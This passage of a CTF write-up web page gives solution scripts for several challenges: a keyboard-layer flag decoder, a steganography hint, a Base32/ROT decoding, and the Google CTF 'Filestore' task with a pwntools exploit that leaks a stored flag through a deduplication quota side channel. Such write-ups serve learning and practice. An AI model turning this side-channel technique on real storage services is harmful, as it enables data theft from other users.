0x003C, 0x003D, 0x0000, 0x003E, 0x003F, 0x0040, 0x0041, 0x0042,
0x0043, 0x0044, 0x0045, 0x0046, 0x0047, 0x0048, 0x0035, 0x0012,
0x0013, 0x000D, 0x0020, 0x001B, 0x0016, 0x000E, 0x0005, 0x0011,
0x001A, 0x002D, 0x002E, 0x002A, 0x0000, 0x0049, 0x004A, 0x004B,
0x002B, 0x0000, 0x0015, 0x000A, 0x0027, 0x0022, 0x0009, 0x0018,
0x0024, 0x0023, 0x0017, 0x0006, 0x002F, 0x0030, 0x0031, 0x004C,
0x004D, 0x004E, 0x0039, 0x0000, 0x0007, 0x0004, 0x0010, 0x000C,
0x0019, 0x0008, 0x001C, 0x0014, 0x000F, 0x0033, 0x0034, 0x0028,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x00E1, 0x001F, 0x000B,
0x001E, 0x0025, 0x001D, 0x0026, 0x0021, 0x0036, 0x0037, 0x0038,
0x0000, 0x00E5, 0x0000, 0x0000, 0x0052, 0x0000, 0x00E0, 0x00E3,
0x0000, 0x00E2, 0x0000, 0x0000, 0x002C, 0x0000, 0x0000, 0x0000,
0x00E6, 0x00E7, 0x0000, 0x0065, 0x00E4, 0x0050, 0x0051, 0x004F,
0x0029, 0x0000, 0x003A, 0x003B, 0x003C, 0x003D, 0x0000, 0x003E,
0x003F, 0x0040, 0x0041, 0x0042, 0x0043, 0x0044, 0x0045, 0x0046,
0x0047, 0x0048, 0x0035, 0x0001, 0x0001, 0x0001, 0x0001, 0x0001,
0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x002D, 0x002E, 0x002A,
0x0000, 0x0049, 0x004A, 0x004B, 0x002B, 0x0000, 0x0025, 0x0004,
0x0023, 0x0015, 0x0008, 0x001D, 0x0019, 0x001F, 0x0006, 0x0027,
0x002F, 0x0030, 0x0031, 0x004C, 0x004D, 0x004E, 0x0039, 0x0000,
0x0010, 0x0007, 0x000F, 0x0009, 0x0021, 0x0022, 0x001E, 0x0026,
0x000B, 0x0033, 0x0034, 0x0028, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x00E1, 0x0018, 0x001C, 0x0024, 0x0014, 0x0017, 0x000C,
0x000A, 0x0036, 0x0037, 0x0038, 0x0000, 0x00E5, 0x0000, 0x0000,
0x0052, 0x0000, 0x00E0, 0x00E3, 0x0000, 0x00E2, 0x0000, 0x0000,
0x002C, 0x0000, 0x0000, 0x0000, 0x00E6, 0x00E7, 0x0000, 0x0065,
0x00E4, 0x0050, 0x0051, 0x004F]
LayerMap = [dict(), dict(), dict()]
def buildLayerMap(layer):
for i in range(108):
curr_keycode = keymaps[layer * 108 + i]
if curr_keycode == 1: # KC_TRANSPARENT
curr_keycode = keymaps[(layer - 1) * 108 + i]
LayerMap[layer][ keycodeToKey[ curr_keycode ] ] = keycodeToKey[ keymaps[i] ]
def formatLayer():
for layer in range(0, 3):
for col in range(6):
for row in range(18):
print(keycodeToKey[ keymaps[layer * 108 + col * 18 + row]].ljust(15),end=',')
print()
print()
formatLayer()
buildLayerMap(1)
buildLayerMap(2)
SEED = rand()
sum = 0
enc = "1CTED8IL-BIMM-SMFP-HOKP-HOIDRZL4W6KR"
Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
flag=""
for i in range(36):
rand()
Layer_stat = (i // 18) + 1
if enc[i] in Table:
if Layer_stat == 1:
keycode = Table.index(enc[i]) - (rand() % 36)
if keycode &lt; KC_A:
keycode += 36
sum += keycode
else:
keycode = Table.index(enc[i]) + (sum % 40)
if keycode &gt; KC_0:
keycode -= 36
sum += keycode
flag += LayerMap[ Layer_stat ][ keycodeToKey[keycode] ][3:]
else:
flag += enc[i]
print("flag{" + flag + "}")
</code></pre>
<h2 id="01世界"><a class="header" href="#01世界">01世界</a></h2>
<pre><code class="language-sh">stegsolve 01.png
#click left color map get qrcode
#decode qrcode get flag
</code></pre>
<h2 id="base"><a class="header" href="#base">Base</a></h2>
<pre><code class="language-sh">#give 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d
ctf-party 31332b353d3f3f3f2d2d2d2d7a6d6a74706d3838757366677a6d797474736467746d65697a6c6c74787a6d657a61646a766d6f66757365677262776b7a77666a7a61796f7a646d75373d3d3d from_hex
#get
13+5=???----zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7===
#后面部分很像base6413+5联想到ROT13+ROT5解密得到
mzwgcz33hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh2===
根据题目Base32解密为flag{9e6ef1a3f5f0e31cadd29c297bef5ad2}
</code></pre>
<p>exp.rb</p>
<pre><code class="language-ruby">require 'ctf_party'
#后面部分很像base6413+5联想到ROT13+ROT5
s = "zmjtpm88usfgzmyttsdgtmeizlltxzmezadjvmofusegrbwkzwfjzayozdmu7==="
r13 = s.rot(shift: 13)
r5 = s.rot(shift: 5)
p r13 # mzwgcz88hfstmzlggfqtgzrvmyygkmzrmnqwizbshfrteojxmjswmnlbmqzh7===
</code></pre>
<h2 id="filestoregoogle_ctf"><a class="header" href="#filestoregoogle_ctf">Filestore(Google_CTF)</a></h2>
<p>task.py</p>
<pre><code class="language-python">import os, secrets, string, time
# from flag import flag
# my flag
flag = "flag{1ww717-nxnxksn-xsnjxsnxjs}"
def main():
# It's a tiny server...
blob = bytearray(2**16)
files = {}
used = 0
# Use deduplication to save space.
def store(data):
nonlocal used
MINIMUM_BLOCK = 16
MAXIMUM_BLOCK = 1024
part_list = []
while data:
prefix = data[:MINIMUM_BLOCK]
ind = -1
bestlen, bestind = 0, -1
while True:
ind = blob.find(prefix, ind+1)
if ind == -1: break
length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
if length &gt; bestlen:
bestlen, bestind = length, ind
if bestind != -1:
part, data = data[:bestlen], data[bestlen:]
part_list.append((bestind, bestlen))
else:
part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
blob[used:used+len(part)] = part
part_list.append((used, len(part)))
used += len(part)
assert used &lt;= len(blob)
fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
files[fid] = part_list
return fid
def load(fid):
data = []
for ind, length in files[fid]:
data.append(blob[ind:ind+length])
return b"".join(data)
print("Welcome to our file storage solution.")
# Store the flag as one of the files.
store(bytes(flag, "utf-8"))
while True:
print()
print("Menu:")
print("- load")
print("- store")
print("- status")
print("- exit")
choice = input().strip().lower()
if choice == "load":
print("Send me the file id...")
fid = input().strip()
data = load(fid)
print(data.decode())
elif choice == "store":
print("Send me a line of data...")
data = input().strip()
fid = store(bytes(data, "utf-8"))
print("Stored! Here's your file id:")
print(fid)
elif choice == "status":
print("User: ctfplayer")
print("Time: %s" % time.asctime())
kb = used / 1024.0
kb_all = len(blob) / 1024.0
print("Quota: %0.3fkB/%0.3fkB" % (kb, kb_all))
print("Files: %d" % len(files))
elif choice == "exit":
break
else:
print("Nope.")
break
try:
main()
except Exception:
print("Nope.")
time.sleep(1)
</code></pre>
<p>exp.py</p>
<pre><code class="language-python">from pwn import *
local = True
debug = False
if local:
r = process(["python3", "task.py"], level='debug') if debug else process(["python3", "task.py"])
else:
r = remote("filestore.2021.ctfcompetition.com", 1337, level = 'debug') if debug else remote("filestore.2021.ctfcompetition.com", 1337)
possible_chars = [chr(i) for i in range(33, 127)]
FLAG = "flag{"
r.recvuntil(b"- exit\n")
for _ in range(30):
try:
for char in possible_chars:
r.sendline(b"status")
r.recvuntil(b"Quota: ")
current_quota = r.recvline(keepends=False)
r.sendline(b"store")
r.sendline(FLAG[-15:] + char)
r.sendline(b"status")
r.recvuntil(b"Quota: ")
new_quota = r.recvline(keepends=False)
if new_quota == current_quota:
FLAG += char
print(FLAG)
break
except EOFError:
if local:
r = process(["python3", "task.py"], level='debug') if debug else process(["python3", "task.py"])
else:
r = remote("filestore.2021.ctfcompetition.com", 1337, level = 'debug') if debug else remote("filestore.2021.ctfcompetition.com", 1337)
</code></pre>
</main>
<nav class="nav-wrapper" aria-label="Page navigation">
<!-- Mobile navigation buttons -->
<a rel="prev" href="../../posts/ctf/CTF.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
<i class="fa fa-angle-left"></i>
</a>
<a rel="next prefetch" href="../../posts/ctf/0.1_Web.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
<i class="fa fa-angle-right"></i>
</a>
<div style="clear: both"></div>
</nav>
</div>
</div>
<nav class="nav-wide-wrapper" aria-label="Page navigation">
<a rel="prev" href="../../posts/ctf/CTF.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left">
<i class="fa fa-angle-left"></i>
</a>
<a rel="next prefetch" href="../../posts/ctf/0.1_Web.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right">
<i class="fa fa-angle-right"></i>
</a>
</nav>
</div>
<script>
window.playground_line_numbers = true;
</script>
<script>
window.playground_copyable = true;
</script>
<script src="../../ace.js"></script>
<script src="../../editor.js"></script>
<script src="../../mode-rust.js"></script>
<script src="../../theme-dawn.js"></script>
<script src="../../theme-tomorrow_night.js"></script>
<script src="../../elasticlunr.min.js"></script>
<script src="../../mark.min.js"></script>
<script src="../../searcher.js"></script>
<script src="../../clipboard.min.js"></script>
<script src="../../highlight.js"></script>
<script src="../../book.js"></script>
<!-- Custom JS scripts -->
<script src="../../src/js/custom.js"></script>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink